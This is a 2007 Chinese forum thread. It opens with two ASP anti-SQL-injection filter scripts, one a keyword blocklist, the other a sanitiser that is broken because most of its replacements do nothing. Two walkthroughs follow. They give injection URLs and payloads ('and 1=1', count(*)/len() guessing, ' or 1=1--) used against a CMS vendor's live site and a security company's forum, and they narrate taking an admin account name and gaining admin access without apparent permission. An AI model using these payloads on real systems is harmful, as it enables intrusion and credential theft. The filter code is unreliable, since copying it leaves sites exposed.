两个防SQL注入过滤代码
<%
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'ASP通用防注入代码
'您可以把该代码COPY到头文件中.也可以单独作
'为一个文件存在,每次调用使用
'作者:y3gu - 2005-7-29
'http://www.dosu.cn
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Dim GetFlag Rem(提交方式)
Dim ErrorSql Rem(非法字符)
Dim RequestKey Rem(提交数据)
Dim ForI Rem(循环标记)
ErrorSql = "'~;~and~(~)~exec~update~count~*~%~chr~mid
~master~truncate~char~declare" Rem(每个敏感字符或者词语请使用半角 "~" 格开)
ErrorSql = split(ErrorSql,"~")
If Request.ServerVariables("REQUEST_METHOD")="GET" Then
GetFlag=True
Else
GetFlag=False
End If
If GetFlag Then
For Each RequestKey In Request.QueryString
For ForI=0 To Ubound(ErrorSql)
If Instr(LCase(Request.QueryString(RequestKey)),
ErrorSql(ForI))<>0 Then
response.write "<script>alert(""警告:\n请不要使用敏感字符"");location.href=""Sql.asp"";</script>"
Response.End
End If
Next
Next
Else
For Each RequestKey In Request.Form
For ForI=0 To Ubound(ErrorSql)
If Instr(LCase(Request.Form(RequestKey)),
ErrorSql(ForI))<>0 Then
response.write "<script>alert(""警告:\n请不要使用敏感字符"");location.href=""Sql.asp"";</script>"
Response.End
End If
Next
Next
End If
%>

第二个

Function Checkstr(Str)
If Isnull(Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"", 1, －1, 1)
Str = Replace(Str, """", """, 1, －1, 1)
Str = Replace(Str,"<；","<；", 1, －1, 1)
Str = Replace(Str,">；",">；", 1, －1, 1)
Str = Replace(Str, "script", "script", 1, －1, 0)
Str = Replace(Str, "SCRIPT", "SCRIPT", 1, －1, 0)
Str = Replace(Str, "Script", "Script", 1, －1, 0)
Str = Replace(Str, "script", "Script", 1, －1, 1)
Str = Replace(Str, "object", "object", 1, －1, 0)
Str = Replace(Str, "OBJECT", "OBJECT", 1, －1, 0)
Str = Replace(Str, "Object", "Object", 1, －1, 0)
Str = Replace(Str, "object", "Object", 1, －1, 1)
Str = Replace(Str, "applet", "applet", 1, －1, 0)
Str = Replace(Str, "APPLET", "APPLET", 1, －1, 0)
Str = Replace(Str, "Applet", "Applet", 1, －1, 0)
Str = Replace(Str, "applet", "Applet", 1, －1, 1)
Str = Replace(Str, "[", "[")
Str = Replace(Str, "]", "]")
Str = Replace(Str, """", "", 1, －1, 1)
Str = Replace(Str, "=", "=", 1, －1, 1)
Str = Replace(Str, "’", "’’", 1, －1, 1)
Str = Replace(Str, "select", "select", 1, －1, 1)
Str = Replace(Str, "execute", "execute", 1, －1, 1)
Str = Replace(Str, "exec", "exec", 1, －1, 1)
Str = Replace(Str, "join", "join", 1, －1, 1)
Str = Replace(Str, "union", "union", 1, －1, 1)
Str = Replace(Str, "where", "where", 1, －1, 1)
Str = Replace(Str, "insert", "insert", 1, －1, 1)
Str = Replace(Str, "delete", "delete", 1, －1, 1)
Str = Replace(Str, "update", "update", 1, －1, 1)
Str = Replace(Str, "like", "like", 1, －1, 1)
Str = Replace(Str, "drop", "drop", 1, －1, 1)
Str = Replace(Str, "create", "create", 1, －1, 1)
Str = Replace(Str, "rename", "rename", 1, －1, 1)
Str = Replace(Str, "count", "count", 1, －1, 1)
Str = Replace(Str, "chr", "chr", 1, －1, 1)
Str = Replace(Str, "mid", "mid", 1, －1, 1)
Str = Replace(Str, "truncate", "truncate", 1, －1, 1)
Str = Replace(Str, "nchar", "nchar", 1, －1, 1)
Str = Replace(Str, "char", "char", 1, －1, 1)
Str = Replace(Str, "alter", "alter", 1, －1, 1)
Str = Replace(Str, "cast", "cast", 1, －1, 1)
Str = Replace(Str, "exists", "exists", 1, －1, 1)
Str = Replace(Str,Chr(13),"<；br>；", 1, －1, 1)
CheckStr = Replace(Str,"’","’’", 1, －1, 1)
End Function

︷мē.飛_ · 发表于 2007-7-3 09:51:26

蓝雨设计整站SQL注入漏洞
最近无聊，在网上走来走去看看。发现现在的整站系统可是越来越多了，修改版本等等的N多阿！而蓝雨设计整站的使用者也越来越多了，蓝雨整站系统是从NOWA 0.94修改而来的！基于NOWA的系统不单指蓝雨一个还有很多的！我在此就不一一列举了，核心都是一样，只是程序的附加功能就各自不同！安全方面因为基于NOWA的系统所以到目前知道的漏洞就只有上传而已。以下文章中就会出现NOWA修改系统漏洞当中从未有的SQL注入漏洞！只怪蓝雨修改程序的时候没有做好注入问题了！这个可不能怪我！谁叫人家程序设计员不会注意安全死角阿？

一，确定注入点
我们就拿官方网站进行测试，因为担心外面提供的版本并非最新版本导致文章的正确性有差异。首先我们提交http://***.net/view.asp?
action=art&art_id=70 and 1=1 返回以下信息。
再次输入
http://***.net/view.asp?
action=art&art_id=70%20and%201=2 返回以下信息
从标准的SQL注入点检测and1=1和and 1=2d 信息返回可以看出，两个图片的分别这个程序的评论存在着SQL注入，因为现在基于NOWA的修改版本都是基于ACCESS数据库架构的，所以我们可以进一步的确定这个程序的数据库类型。

二，猜解数据库表
因为本人懒惰所以只好借用NBSI进行SQL注入的工作了，怎么知道是不是因为的NBSI实在太厉害了，不能够杀鸡用牛刀。竟然它全部检测不出我所找到的SQL注入点存在着SQL注入！实在太令人感到吃惊（HaK_BaN：难道真的....真的要我手动注入T_T）NBSI太给面子了！所以我只好硬着头皮去进行手动注入了。首先猜解数据库的表是否存在admin表。构造语句提交
http://***.net/view.asp?
action=art&art_id=70%20and%200????
(select%20count(*)%20from%20admin) 现在的程序当中的数据库管理员表，不就是admin，adminuser user之类的名称，所以我们只要抓住程序作者的心理就可以知道了，提交语句之后页面返回正常，我们就可以确定数据库当中是存在admin这个表的。我们只是需要admin的密码以及账号，所以数据库当中其他的表可以忽略。

三，猜解数据库字段
在猜解之前为了减少更多的麻烦和无谓的猜解，应该要对于所入侵的网站进行一些资料的搜集，例如管理员的QQ以及管理员所使用的网名都是要知道的，因为我们通常都会使用容易记忆的密码以及账号，从而使自己可以不会忘记。找了文章页面等等的功能页面都找不到文章编辑以及管理员的QQ号码。只好在BBS当中寻找了，很幸运的是我们在BBS当中找到了“蓝雨”这个用户名，这样子等待会猜解admin账号的时候我们可以试试中文的名字或者是拼音字母。（HaK_BaN：我可是曾经在MSN以一个名字看穿PLMM性格以及生日的哦，大家要注意社\会工程学的重要性阿）
废话少说，我们看看这个程序的管理员字段是什么！？首先猜解是name的提交语句如下http://***.net/view.asp?
action=art&art_id=70%20and%201=
(select%20count(*)%20from%20admin%20where%20len(name)
??0) (HaK_BaN:*_*不是阿！不是NAME字段阿）提交语句后信息返回页面显示不正常就证实admin表中没有name这个字段名。看来又要想想如何去进行猜解了，既然name字段不行就试试admin_name字段行不行！再次构造猜解字段语句：
http://***.net/view.asp?action=
art&art_id=70%20and%201=
(select%20count(*)%20from%20admin%20where%20len
(admin_name)??0) （HaK_BaN：这下子总可以了吧？我又迈进一步了！）提交语句之后页面返回正常了，这下子终于可以了。
然后，我们就开始猜解password的字段了，其实一看上面的回显我们就可以非常肯定的说password字段就是admin_password，所以提交的语句就是
http://***.net/view.asp?
action=art&art_id=70%20and%201=
(select%20count(*)%20from%20admin%20where%20len
(admin_password)??0) 信息回显正常对吧！？哈哈哈（
说到这里整个猜解就差不多完场了！（菜鸟：什么什么阿？还有账号和密码了？你丫的是不是傻了？）猜解密码和账号就更加是一个麻烦和浪费时间的活来的！好好，我们去看看账号和密码的猜解如何？首先我们猜解账号的长短阿！假设，我们之前就已经拿到了管理员常用的账号名称“蓝雨”是管理员账号。我们就有两种可能性，一是蓝雨的拼音“lanyu”，二是蓝雨的中文转为ASCII码进行猜解。我们首先试试拼音这个的可能性，如果是这样子的话我们就要构造admin_name的长度为5，所以提交语句为http://***.net/view.asp?
action=art&art_id=70%20and%201=
(select%20count(*)%20from%20admin%20where%20len
(admin_name)??5) 页面信息返回无法正常显示。
然后再提交http://fj126.net/view.asp?action=
art&art_id=70%20and%201=
(select%20count(*)%20from%20admin%20where%20len
(admin_name)??4)
这下子页面可算是正常了！然后再次提交语句为
http://***.net/view.asp?
action=art&art_id=70%20and%201=(select%20count(*)
%20from%20admin%20where%20len
(admin_name)=5)
我们就可以确定admin_name的长度为5了。账号长度出来了，而password的长度我们还不知道，根据信息收集得知密码是利用MD5 16位加密的，所以我们可以猜解为密码长度是16位喔！提交语句http://***.net/view.asp?
action=art&art_id=70%20and%201=
(select%20count(*)%20from%20admin%20where%20len
(admin_password)=16)这里就不截图了！我们可以基本上就知道了！账号长度为5位，密码长度为16位。（HaK_BaN：说真的我很久没有手动了，都差不多腰酸背痛了！）至于账号是多少密码是多少我就不再列举了！经过测试刚刚的社\会工程学得到的管理员账号为：lanyu是正确的！而密码的确是MD516位加密。整个过程可以利用臭要饭的CSC进行注入测试！

四，总结
整个程序的SQL注入页面有几个，都是基于蓝雨整站自身添加的功能页面没有做好相关的SQL注入导致的，如果大家有在使用这个程序的话，可以使用通用防止注入的脚本进行防止，虽然说MD5需要暴力破解，但是如果你真的得罪人的话，不要说破解了。可能你的网站都会被别人干的一干二净，网络安全是很重要的一部分，希望大家不要轻视安全这个环节！

︷мē.飛_ · 发表于 2007-7-3 09:55:09

SQL注入渗透某网络安全公司的网站全过程
前言:写这篇文章不是为了告诉大家如何去做入侵，而是希望提醒大家:“入侵是偶然的，但安全并不是必然的”，不要疏忽运作上的一些小细节。
笔者一直都有经常性地到一些安全方面的网站瞎逛的习惯的，最近因为一次机缘巧合之下通过链接来到广州某个颇有名气的网络安全公司的网站。说实在的，这个网站好象挺多元化的，提供软件下载之余，还有自己的论坛(嘿嘿，界面做得还真不赖嘛，不知道安全性如何呢？)。出于对其安全操守的好奇，小神决定义务为其做个的初步的“安全渗透测试”。开始时只是拿一些综合性的网络漏洞扫描工具(X-scan3.0、Nmap、Retina等等)进行信息扫描，然后做个结果筛选，结果只查到对方开了TCP80端口(也就是说他们的服务器只提供了正常的HTTP服务)，且无任何典型的漏洞....没戏了，对方毕竟还是一间有些知名度的企业嘛(因为这篇文章的重点并不在此，所以用网络漏洞扫描器作信息扫描这个步骤我就不在这里多作说明了)。就这样放弃了吗？没那么容易...恰好小神最近在整理SQL Injection(SQL注入攻击)方面的资料，既然现在有机会就再“勉为其难”地帮它测试一下吧

------------------------------------------------------------------------------------------
提示:
问:什么是SQL注入？
答:这种攻击的要诀在于将SQL的查询/行为命令通过‘嵌入’的方式放入合法的HTTP提交请求中从而达到攻击者的某种意图。现在很多的动态网页都会从该网页使用者的请求中得到某些参数，然后动态的构成SQL请求发给数据库的。举个例子，当有某个用户需要通过网页上的用户登陆(用户身份验证)时，动态网页会将该用户提交上来的用户名与密码加进SQL询问请求发给数据库，用于确认该用户提交的身份验证信息是否有效。在SQL注入攻击的角度看来，这样可以使我们在发送SQL请求时通过修改用户名与/或密码值的‘领域’区来达到攻击的目的。

SQL注入技术的更多相关信息请看:
http://demonalex.nease.net/sql_injection/walkthrough.txt
------------------------------------------------------------------------------------------
首先是下载系统，随便抽一个工具的下载地址:
http://该安全公司的网址/某目录/download/open.asp?id=3444
------------------------------------------------------------------------------------------
附录:这里笔者用中文代替了某些敏感信息，还请各位见谅哦。
------------------------------------------------------------------------------------------
http://该安全公司的网址/某目录/download/open.asp?id=3444'
先测试一下对方有没有过滤'(单引号)...

示:
问:如何确认一个网站有SQL注入缺陷呢？
答:首先先加入某些特殊的字符标记，输入如:
hi' or 1=1--
寻找一些登陆页面，在其登陆ID与密码输入处，或URL中输入:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.htm?id=hi' or 1=1--
如果想以‘隐藏’的方式进行此类测试，你可以把该HTML网页从网站上下载至本地硬盘，修改其隐藏部分的值，如:
〈FORM action=http://duck/Search/search.asp method=post〉
〈input type=hidden name=A value="hi' or 1=1--"〉
〈/FORM〉
如果阁下是幸运的话估计现在已经可以不需要帐号与密码而‘成功登陆’了。
------------------------------------------------------------------------------------------
再试试下面的url，看看能否返回正常的页面...
http://该安全公司的网址/某目录/download/open.asp?id=3444"
http://该安全公司的网址/某目录/download/open.asp?id=3444' or 1=1--
http://该安全公司的网址/某目录/download/open.asp?id=3444" or 1=1--
http://该安全公司的网址/某目录/download/open.asp?id=3444' or 'a'='a
http://该安全公司的网址/某目录/download/open.asp?id=3444" or "a"="a
------------------------------------------------------------------------------------------
提示:
问:为什么要特意使用' or 1=1--来做测试呢？
答:让我们来看看其他例子中使用'or 1=1--的重要性吧。有别于正常的登陆方式，使用这样的登陆方式可能可以得到正常登陆中不能得到的某些特殊信息。用一个链接中得到的ASP页来打比方:
http://duck/index.htm?category=food
在上面这条URL中，'category'是一个变量名，而'food'是赋予该变量的值。为了做到这些(链接成功)，这个ASP必须包含以下相关的代码(下面也是我们为了演示这个实验所写的代码):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
正如我们所看到的，变量值将会预先处理然后赋值于'v_cat'，也就是说该SQL语句将会变为:
SELECT * FROM product WHERE PCategory='food'
这个请求将会返回通过WHERE条件比较后得到的结果，在这个例子中也就是'food'了。现在设想一下如果我们把该URL改成这样的话:
http://duck/index.htm?category=food' or 1=1--
现在我们的变量v_cat的值就等同于"food' or 1=1--"了，现在如果我们要重新代入那条SQL请求的话，那条SQL请求将会是:
SELECT * FROM product WHERE PCategory='food' or 1=1--'
现在这个请求将会从product表中选取每一条信息而并不会去理会PCategory是否等于'food'。至于结尾部分的那两条'--'(破折号)则用于‘告诉’MS SQL SERVER忽略结尾最后的那个'(单引号)。有的时候也可以使用'#'(井号)来代替'--'(双破折号)在这里的用法。无论如何，如果对方不是一台SQL服务器(这里指的是MS SQL SERVER)，或者你不能使用简单的方法去忽略最后的那个单引号的话，你可以尝试:
' or 'a'='a
这样的话整个SQL请求将会变为:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
它也会返回相同的结果。
根据实际情况，SQL注入请求是可以有多种动态变化的可能性的:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
------------------------------------------------------------------------------------------
都是返回“HTTP 500 - 内部服务器错误”，看来是又失败了，不怕，我们还有希望...此时的希望只能全部寄托在论坛上了...

循序渐进，首先找来一条帖子的url(这一步笔者挑了:http://该安全公司的网址/论坛目录/list.asp?ltid=14这条URL)重复刚刚的行为:
http://该安全公司的网址/论坛目录/list.asp?ltid=14'
http://该安全公司的网址/论坛目录/list.asp?ltid=14"
http://该安全公司的网址/论坛目录/list.asp?ltid=14' or 1=1--
http://该安全公司的网址/论坛目录/list.asp?ltid=14" or 1=1--
http://该安全公司的网址/论坛目录/list.asp?ltid=14' or 'a'='a
http://该安全公司的网址/论坛目录/list.asp?ltid=14" or "a"="a
不过看来还是在吃白果...(如下图所示)

除了地址栏，不要忘了还有论坛首页的登陆框:

在“用户名：”区域中输入:
网***' or 1=1--
然后在“密码：”区域中随便输入几个密码看看吧

------------------------------------------------------------------------------------------
附录:“网***”为我们在论坛首页中看到的那个版主帐号。
------------------------------------------------------------------------------------------

还是不行，试试在密码区域进行注入攻击吧...具体操作:
在“用户名：”中输入:
“网***”
然后在“密码：”中输入:
' or 1=1--
(提交后得到下图)

fail...再用:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
切换了几次，还是不行，看来真的是“坚不可摧”了...
“风继续吹，不忍远离...”小神的MP3里哼着‘哥哥’张国荣的歌，难道就这样离开吗？到论坛的首
页里再逛一圈吧....一扫眼，还真道灵光，注意一下论坛登陆区域上方的小链接，看到了吧？第三条
链接是什么呢？

单击后跳出如下图所示的登陆窗口:

首先在“论坛：”这一拦选中相应的版面(这里笔者挑了第一个版面“安全工具”)，然后再重新尝试一下:
帐号: 网***' or 1=1--
密码: 任意密码

不行，再试试:
帐号: 网***
密码: ' or 1=1--
......
......
小神的手颤了一下，只因“有颜色的界面”出来了:

开始时以为是假象，连忙点击“进入后台>>>”...

这次看来是真的了，点击其中一条帖子再测试一下:

(看到了吧？有“删除”按钮了也...其实我们可以做的还不只这些...PS:小神可是个好孩子哦^_^)
写到这里，也算是有个交代了吧？！^@@^
整篇文章的主旨也不过就是介绍了如何简单地利用SQL注入攻击渗透论坛吧，其实现在再谈SQL注
入也是老生常谈了，但想不到连知名的网络安全公司也有这样的漏洞，归根结底就是人们对安全意识
的不重视而引起的，这篇文章告诉了我们:不要忽视运作中的一些小细节。

帐号		自动登录	找回密码
密码			审核注册